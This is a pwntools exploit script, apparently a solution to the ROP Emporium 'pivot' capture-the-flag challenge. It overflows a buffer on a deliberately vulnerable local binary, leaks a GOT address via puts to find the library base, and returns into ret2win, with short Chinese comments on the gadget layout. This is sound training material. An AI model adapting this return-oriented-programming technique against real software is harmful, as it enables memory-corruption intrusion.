#!/usr/bin/python
#coding=utf-8
from pwn import *
p = process("./pivot")
libc = ELF("./libpivot.so")
pop_rdi=0x400b73
puts_plt =0x400800
foothold_got=0x602048
foothold_plt=0x400850
main_addr=0x400996
paying='a'*8+'b'*8+'c'*8+'d'*8#+'e'*8
payload=paying+ p64(main_addr)+p64(foothold_plt)+p64(main_addr)#gadget_1
#为什么要把rbp位置写成main?这个地址正好排在gadget_2的最后
p.sendlineafter("> ",' ')
p.sendlineafter("> ",payload)
payload=paying+ p64(0)+p64(pop_rdi)+p64(foothold_got)+p64(puts_plt)#gadget_2
#后面没写反回地址,因为不够长了,但是在gadget1的rbp位置正好在这一次没有覆盖
p.sendlineafter("> ",' ')
p.sendlineafter("> ",payload)
addr=u64(p.recv(6).ljust(8,"\x00"))
libc.address=addr-libc.symbols["foothold_function"]
ret2win=libc.symbols["ret2win"]
payload=paying+ p64(0)+p64(ret2win)
p.recvuntil('> ')
p.sendlineafter("> ",payload)
print '+++\n '+p.recvline()+'+++'
